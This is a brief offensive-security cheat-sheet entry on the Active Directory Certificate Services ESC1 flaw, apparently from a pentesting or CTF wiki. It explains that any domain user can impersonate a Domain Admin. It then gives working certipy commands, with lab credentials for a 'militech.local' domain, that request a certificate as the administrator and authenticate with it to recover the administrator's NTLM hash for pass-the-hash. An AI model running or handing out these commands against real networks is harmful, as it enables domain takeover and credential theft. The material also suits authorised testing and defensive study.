ESC1
ABOUT
ESC1 (from ESCalate) allows any domain user to impersonate (become) a Domain Admin or any other user by requesting a certificate "as them" and logging in using that certificate.
EXPLOITATION
Request Cert as Admin
certipy req -u 'Solomon.Reed@militech.local' -p 'SuperAgent12' -dc-ip 13.13.13.13 -target 13.13.13.13 -ca militech-DC-CA -template UserAuthentication -upn administrator@militech.local -debug
Auth as Admin
certipy auth -pfx administrator.pfx -dc-ip 13.13.13.13
In the result we would have administrator's NTLM hash we could use for PTH.
RESOURCES
Last updated